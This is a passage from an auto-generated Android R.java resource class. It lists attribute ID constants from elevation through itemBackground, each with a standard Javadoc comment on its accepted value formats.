"<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int elevation=0x7f010045; /** <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int enforceMaterialTheme=0x7f0101da; /** <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int enforceTextAppearance=0x7f0101db; /** <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int errorEnabled=0x7f0101c6; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int errorTextAppearance=0x7f0101c7; /** The drawable to show in the button for expanding the activities overflow popup. <strong>Note:</strong> Clients would like to set this drawable as a clue about the action the chosen activity will perform. For example, if share activity is to be chosen the drawable should give a clue that sharing is to be performed. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int expandActivityOverflowButtonDrawable=0x7f010049; /** <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int expanded=0x7f010145; /** <p>Must be one or more (separated by '|') of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>top</code></td><td>0x30</td><td></td></tr> <tr><td><code>bottom</code></td><td>0x50</td><td></td></tr> <tr><td><code>left</code></td><td>0x03</td><td></td></tr> <tr><td><code>right</code></td><td>0x05</td><td></td></tr> <tr><td><code>center_vertical</code></td><td>0x10</td><td></td></tr> <tr><td><code>fill_vertical</code></td><td>0x70</td><td></td></tr> <tr><td><code>center_horizontal</code></td><td>0x01</td><td></td></tr> <tr><td><code>center</code></td><td>0x11</td><td></td></tr> <tr><td><code>start</code></td><td>0x00800003</td><td></td></tr> <tr><td><code>end</code></td><td>0x00800005</td><td></td></tr> </table> */ public static final int expandedTitleGravity=0x7f010187; /** <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int expandedTitleMargin=0x7f01017a; /** <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int expandedTitleMarginBottom=0x7f01017e; /** <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int expandedTitleMarginEnd=0x7f01017d; /** <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int expandedTitleMarginStart=0x7f01017b; /** <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int expandedTitleMarginTop=0x7f01017c; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int expandedTitleTextAppearance=0x7f01017f; /** This drawable is a state list where the "checked" state indicates active media routing. Checkable indicates connecting and non-checked / non-checkable indicates that media is playing to the local device only. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int externalRouteEnabledDrawable=0x7f01001b; /** <p>Must be one of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>center</code></td><td>0</td><td></td></tr> <tr><td><code>end</code></td><td>1</td><td></td></tr> </table> */ public static final int fabAlignmentMode=0x7f01014d; /** <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int fabCradleMargin=0x7f01014e; /** <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int fabCradleRoundedCornerRadius=0x7f01014f; /** <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int fabCradleVerticalOffset=0x7f010150; /** <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int fabCustomSize=0x7f01018c; /** <p>Must be one of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>auto</code></td><td>-1</td><td></td></tr> <tr><td><code>normal</code></td><td>0</td><td></td></tr> <tr><td><code>mini</code></td><td>1</td><td></td></tr> </table> */ public static final int fabSize=0x7f01018b; /** <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int fastScrollEnabled=0x7f01000a; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int fastScrollHorizontalThumbDrawable=0x7f01000d; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int fastScrollHorizontalTrackDrawable=0x7f01000e; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int fastScrollVerticalThumbDrawable=0x7f01000b; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int fastScrollVerticalTrackDrawable=0x7f01000c; /** Distance from the top of the TextView to the first text baseline. If set, this overrides the value set for paddingTop. <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int firstBaselineToTopHeight=0x7f01005f; /** <p>May be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>May be a string value, using '\\;' to escape characters such as '\\n' or '\\uxxxx' for a unicode character. <p>May be an integer value, such as "<code>100</code>". <p>May be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>May be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>May be a floating point value, such as "<code>1.2</code>". <p>May be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>May be a fractional value, which is a floating point number appended with either % or %p, such as "<code>14.5%</code>". The % suffix always means a percentage of the base size; the optional %p suffix provides a size relative to some parent container. */ public static final int floatingActionButtonStyle=0x7f01012c; /** The reference to the font file to be used. This should be a file in the res/font folder and should therefore have an R reference value. E.g. @font/myfont <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int font=0x7f0101ed; /** The attribute for the font family. <p>Must be a string value, using '\\;' to escape characters such as '\\n' or '\\uxxxx' for a unicode character. <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int fontFamily=0x7f01005d; /** The authority of the Font Provider to be used for the request. <p>Must be a string value, using '\\;' to escape characters such as '\\n' or '\\uxxxx' for a unicode character. <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int fontProviderAuthority=0x7f0101e6; /** The sets of hashes for the certificates the provider should be signed with. This is used to verify the identity of the provider, and is only required if the provider is not part of the system image. This value may point to one list or a list of lists, where each individual list represents one collection of signature hashes. Refer to your font provider's documentation for these values. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int fontProviderCerts=0x7f0101e9; /** The strategy to be used when fetching font data from a font provider in XML layouts. This attribute is ignored when the resource is loaded from code, as it is equivalent to the choice of API between {@link androidx.core.content.res.ResourcesCompat#getFont(Context, int)} (blocking) and {@link androidx.core.content.res.ResourcesCompat#getFont(Context, int, FontCallback, Handler)} (async). <p>Must be one of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>blocking</code></td><td>0</td><td> The blocking font fetch works as follows. First, check the local cache, then if the requested font is not cached, request the font from the provider and wait until it is finished. You can change the length of the timeout by modifying fontProviderFetchTimeout. If the timeout happens, the default typeface will be used instead. </td></tr> <tr><td><code>async</code></td><td>1</td><td> The async font fetch works as follows. First, check the local cache, then if the requeted font is not cached, trigger a request the font and continue with layout inflation. Once the font fetch succeeds, the target text view will be refreshed with the downloaded font data. The fontProviderFetchTimeout will be ignored if async loading is specified. </td></tr> </table> */ public static final int fontProviderFetchStrategy=0x7f0101ea; /** The length of the timeout during fetching. <p>May be an integer value, such as "<code>100</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>May be one of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>forever</code></td><td>-1</td><td> A special value for the timeout. In this case, the blocking font fetching will not timeout and wait until a reply is received from the font provider. </td></tr> </table> */ public static final int fontProviderFetchTimeout=0x7f0101eb; /** The package for the Font Provider to be used for the request. This is used to verify the identity of the provider. <p>Must be a string value, using '\\;' to escape characters such as '\\n' or '\\uxxxx' for a unicode character. <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int fontProviderPackage=0x7f0101e7; /** The query to be sent over to the provider. Refer to your font provider's documentation on the format of this string. <p>Must be a string value, using '\\;' to escape characters such as '\\n' or '\\uxxxx' for a unicode character. <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int fontProviderQuery=0x7f0101e8; /** The style of the given font file. This will be used when the font is being loaded into the font stack and will override any style information in the font's header tables. If unspecified, the value in the font's header tables will be used. <p>Must be one of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>normal</code></td><td>0</td><td></td></tr> <tr><td><code>italic</code></td><td>1</td><td></td></tr> </table> */ public static final int fontStyle=0x7f0101ec; /** The variation settings to be applied to the font. The string should be in the following format: "'tag1' value1, 'tag2' value2, ...". If the default variation settings should be used, or the font used does not support variation settings, this attribute needs not be specified. <p>Must be a string value, using '\\;' to escape characters such as '\\n' or '\\uxxxx' for a unicode character. <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int fontVariationSettings=0x7f0101ef; /** The weight of the given font file. This will be used when the font is being loaded into the font stack and will override any weight information in the font's header tables. Must be a positive number, a multiple of 100, and between 100 and 900, inclusive. The most common values are 400 for regular weight and 700 for bold weight. If unspecified, the value in the font's header tables will be used. <p>Must be an integer value, such as "<code>100</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int fontWeight=0x7f0101ee; /** <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int foregroundInsidePadding=0x7f010195; /** The max gap between the bars when they are parallel to each other <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int gapBetweenBars=0x7f0100de; /** Go button icon <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int goIcon=0x7f0100fb; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int headerLayout=0x7f01019f; /** <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int height=0x7f01002a; /** <p>Must be a string value, using '\\;' to escape characters such as '\\n' or '\\uxxxx' for a unicode character. <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int helperText=0x7f0101c3; /** <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int helperTextEnabled=0x7f0101c4; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int helperTextTextAppearance=0x7f0101c5; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int hideMotionSpec=0x7f01012d; /** Set true to hide the action bar on a vertical nested scroll of content. <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int hideOnContentScroll=0x7f01003e; /** <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int hideOnScroll=0x7f010151; /** <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int hintAnimationEnabled=0x7f0101c1; /** <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int hintEnabled=0x7f0101c0; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int hintTextAppearance=0x7f0101c2; /** Specifies a drawable to use for the 'home as up' indicator. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int homeAsUpIndicator=0x7f010091; /** Specifies a layout to use for the "home" section of the action bar. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int homeLayout=0x7f010039; /** <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int hoveredFocusedTranslationZ=0x7f01018d; /** Specifies the drawable used for the application icon. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int icon=0x7f010032; /** <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int iconEndPadding=0x7f01016e; /** <p>Must be one or more (separated by '|') of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>start</code></td><td>0x1</td><td></td></tr> <tr><td><code>textStart</code></td><td>0x2</td><td></td></tr> </table> */ public static final int iconGravity=0x7f010198; /** <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int iconPadding=0x7f010197; /** <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int iconSize=0x7f010196; /** <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm (millimeters). <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int iconStartPadding=0x7f01016d; /** Tint to apply to the icon. <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. <p>Must be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int iconTint=0x7f0100ee; /** Blending mode used to apply the icon tint. <p>Must be one of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>src_over</code></td><td>3</td><td> The tint is drawn on top of the icon. [Sa + (1 - Sa)*Da, Rc = Sc + (1 - Sa)*Dc] </td></tr> <tr><td><code>src_in</code></td><td>5</td><td> The tint is masked by the alpha channel of the icon. The icon’s color channels are thrown out. [Sa * Da, Sc * Da] </td></tr> <tr><td><code>src_atop</code></td><td>9</td><td> The tint is drawn above the icon, but with the icon’s alpha channel masking the result. [Da, Sc * Da + (1 - Sa) * Dc] </td></tr> <tr><td><code>multiply</code></td><td>14</td><td> Multiplies the color and alpha channels of the icon with those of the tint. [Sa * Da, Sc * Dc] </td></tr> <tr><td><code>screen</code></td><td>15</td><td> [Sa + Da - Sa * Da, Sc + Dc - Sc * Dc] </td></tr> <tr><td><code>add</code></td><td>16</td><td> Combines the tint and icon color and alpha channels, clamping the result to valid color values. Saturate(S + D) </td></tr> </table> */ public static final int iconTintMode=0x7f0100ef; /** The default state of the SearchView. If true, it will be iconified when not in use and expanded when clicked. <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int iconifiedByDefault=0x7f0100f7; /** <p>Must be a floating point value, such as "<code>1.2</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int imageAspectRatio=0x7f010001; /** <p>Must be one of the following constant values.</p> <table> <colgroup align="left" /> <colgroup align="left" /> <colgroup align="left" /> <tr><th>Constant</th><th>Value</th><th>Description</th></tr> <tr><td><code>none</code></td><td>0</td><td></td></tr> <tr><td><code>adjust_width</code></td><td>1</td><td></td></tr> <tr><td><code>adjust_height</code></td><td>2</td><td></td></tr> </table> */ public static final int imageAspectRatioAdjust=0x7f010000; /** ImageButton background drawable. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int imageButtonStyle=0x7f0100a1; /** Specifies a style resource to use for an indeterminate progress spinner. <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int indeterminateProgressStyle=0x7f01003b; /** The maximal number of items initially shown in the activity list. <p>Must be a string value, using '\\;' to escape characters such as '\\n' or '\\uxxxx' for a unicode character. <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int initialActivityCount=0x7f010048; /** <p>May be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". <p>May be a color value, in the form of "<code>#<i>rgb</i></code>", "<code>#<i>argb</i></code>", "<code>#<i>rrggbb</i></code>", or "<code>#<i>aarrggbb</i></code>". */ public static final int insetForeground=0x7f0101a2; /** <p>Must be a boolean value, either "<code>true</code>" or "<code>false</code>". <p>This may also be a reference to a resource (in the form "<code>@[<i>package</i>:]<i>type</i>:<i>name</i></code>") or theme attribute (in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>") containing a value of this type. */ public static final int isLightTheme=0x7f01002b; /** <p>Must be a reference to another resource, in the form "<code>@[+][<i>package</i>:]<i>type</i>:<i>name</i></code>" or to a theme attribute in the form "<code>?[<i>package</i>:][<i>type</i>:]<i>name</i></code>". */ public static final int itemBackground=0x7f01019d; /** <p>Must be a dimension value, which is a floating point number appended with a unit such as "<code>14.5sp</code>". Available units are: px (pixels), dp (density-independent pixels), sp (scaled pixels based on preferred font size), in (inches), mm 